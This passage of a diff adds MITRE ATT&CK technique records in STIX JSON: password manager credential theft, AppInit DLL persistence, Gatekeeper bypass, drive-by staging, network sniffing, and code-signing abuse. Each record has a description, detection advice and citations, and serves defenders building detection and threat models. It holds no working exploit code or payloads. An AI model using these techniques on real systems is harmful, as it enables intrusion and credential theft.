"https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/" + }, + { + "source_name": "Krebs-Bazaar", + "description": "Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service Bazaar. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/" + }, + { + "source_name": "Krebs-Booter", + "description": "Brian Krebs. (2016, October 27). Are the Days of “Booter” Services Numbered?. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Password Managers", + "description": "Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)\n\nAdversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)\n Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matt Burrough, @mattburrough, Microsoft" + ], + "x_mitre_detection": "Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. \n\nConsider monitoring file reads surrounding known password manager applications.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", + "created": "2021-01-22T16:08:40.629Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1555/005", + "external_id": "T1555.005" + }, + { + "source_name": "ise Password Manager February 2019", + "description": "ise. (2019, February 19). Password Managers: Under the Hood of Secrets Management. Retrieved January 22, 2021.", + "url": "https://www.ise.io/casestudies/password-manager-hacking/" + }, + { + "source_name": "FoxIT Wocao December 2019", + "description": "Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.", + "url": "https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf" + }, + { + "source_name": "Github KeeThief", + "description": "Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8, 2021.", + "url": "https://github.com/GhostPack/KeeThief" + }, + { + "source_name": "NVD CVE-2019-3610", + "description": "National Vulnerability Database. (2019, October 9). CVE-2019-3610 Detail. Retrieved April 14, 2021.", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3610" + }, + { + "source_name": "Cyberreason Anchor December 2019", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "AppInit DLLs", + "description": "Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)\n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "Administrator", + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_system_requirements": [ + "Secure boot disabled on systems running Windows 8 and later" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--317fefa6-46c7-4062-adb6-2008cf6bcb41", + "created": "2017-05-31T21:31:15.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1103", + "external_id": "T1103" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "AppInit Registry", + "description": "Microsoft. (2006, October). Working with the AppInit_DLLs registry value. Retrieved July 15, 2015.", + "url": "https://support.microsoft.com/en-us/kb/197571" + }, + { + "source_name": "AppInit Secure Boot", + "description": "Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July 15, 2015.", + "url": "https://msdn.microsoft.com/en-us/library/dn280412" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Gatekeeper Bypass", + "description": "Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )\n\nBased on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:\n\n1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)\n\n2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.\n\n3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.\n\n4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.\n\nAdversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)\n\nApplications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Brandon Dalton @PartyD0lphin", + "Swasti Bhushan Deb, IBM India Pvt. Ltd." + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the com.apple.quarantine flag when performing updates. \n\nReview false values under the LSFileQuarantineEnabled entry in an application's Info.plist file (required by every application). false under LSFileQuarantineEnabled indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified LSFileQuarantineEnabled entry will default to not setting the quarantine flag. \n\nQuarantineEvents is a SQLite database containing a list of all files assigned the com.apple.quarantine attribute, located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e", + "created": "2020-02-05T16:16:08.471Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1553/001", + "external_id": "T1553.001" + }, + { + "source_name": "Application Bundle Manipulation Brandon Dalton", + "description": "Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.", + "url": "https://redcanary.com/blog/mac-application-bundles/" + }, + { + "source_name": "theevilbit gatekeeper bypass 2021", + "description": "Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021.", + "url": "https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/" + }, + { + "source_name": "OceanLotus for OS X", + "description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.", + "url": "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update" + }, + { + "source_name": "TheEclecticLightCompany Quarantine and the flag", + "description": "hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021.", + "url": "https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/" + }, + { + "source_name": "TheEclecticLightCompany apple notarization ", + "description": "How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021.", + "url": "https://eclecticlight.co/2020/08/28/how-notarization-works/" + }, + { + "source_name": "20 macOS Common Tools and Techniques", + "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.", + "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-15T00:21:55.791Z", + "name": "Drive-by Target", + "description": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).\n\nAdversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including:\n\n* Inserting malicious scripts into web pages or other user controllable web content such as forum posts\n* Modifying script files served to websites from publicly writeable cloud storage buckets\n* Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))\n\nIn addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)\n\nWebsites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "If infrastructure or patterns in the malicious web content utilized to deliver a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) have been previously identified, internet scanning may uncover when an adversary has staged web content for use in a strategic web compromise.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--31fe0ba2-62fd-4fd9-9293-4043d84f7fe9", + "created": "2021-03-17T20:33:20.127Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1608/004", + "external_id": "T1608.004" + }, + { + "source_name": "ATT ScanBox", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks" + }, + { + "source_name": "Gallagher 2015", + "description": "Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016.", + "url": "http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/" + }, + { + "source_name": "FireEye CFR Watering Hole 2012", + "description": "Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "System Service Discovery", + "description": "Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start.\n\nAdversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Harshal Tupsamudre, Qualys" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", + "created": "2017-05-31T21:30:21.315Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1007", + "external_id": "T1007" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-19T12:32:44.370Z", + "name": "Network Sniffing", + "description": "Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.\n\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)\n\nOn network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Oleg Kolesnikov, Securonix", + "Tiago Faria, 3CORESec", + "Austin Clark, @c2defense", + "Itamar Mizrahi, Cymptom", + "Eliraz Levi, Hunters" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.\n\nIn cloud-based environments, monitor for the creation of new traffic mirrors or modification of existing traffic mirrors. For network infrastructure devices, collect AAA logging to monitor for the capture of network traffic.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network", + "IaaS" + ], + "x_mitre_version": "1.6", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Network interface access and packet capture driver" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", + "created": "2017-05-31T21:30:41.399Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1040", + "external_id": "T1040" + }, + { + "source_name": "AWS Traffic Mirroring", + "description": "Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022.", + "url": "https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html" + }, + { + "source_name": "capture_embedded_packet_on_software", + "description": "Cisco. (2022, August 17). Configure and Capture Embedded Packet on Software. Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/116045-productconfig-epc-00.html" + }, + { + "source_name": "GCP Packet Mirroring", + "description": "Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.", + "url": "https://cloud.google.com/vpc/docs/packet-mirroring" + }, + { + "source_name": "SpecterOps AWS Traffic Mirroring", + "description": "Luke Paine. (2020, March 11). Through the Looking Glass — Part 1. Retrieved March 17, 2022.", + "url": "https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512" + }, + { + "source_name": "Azure Virtual Network TAP", + "description": "Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.", + "url": "https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview" + }, + { + "source_name": "Rhino Security Labs AWS VPC Traffic Mirroring", + "description": "Spencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.", + "url": "https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:02.990Z", + "name": "Exploit Public-Facing Application", + "description": "Adversaries may leverage weaknesses to exploit internet-facing software for initial access into an industrial network. Internet-facing software may be user applications, underlying networking implementations, an assets operating system, weak defenses, etc. Targets of this technique may be intentionally exposed for the purpose of remote management and visibility.\n\nAn adversary may seek to target public-facing applications as they may provide direct access into an ICS environment or the ability to move into the ICS network. Publicly exposed applications may be found through online tools that scan the internet for open ports and services. Version numbers for the exposed application may provide adversaries an ability to target specific known vulnerabilities. Exposed control protocol or remote access ports found in Commonly Used Port may be of interest by adversaries.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0819", + "external_id": "T0819" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Application Deployment Software", + "description": "Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.\n\nAccess to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor application deployments from a secondary system. Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Access to application deployment software (EPO, HPCA, Altiris, etc.)" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61", + "created": "2017-05-31T21:30:27.755Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1017", + "external_id": "T1017" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/187.html", + "external_id": "CAPEC-187" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-09-22T19:13:52.548Z", + "name": "Code Signing", + "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)\n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + 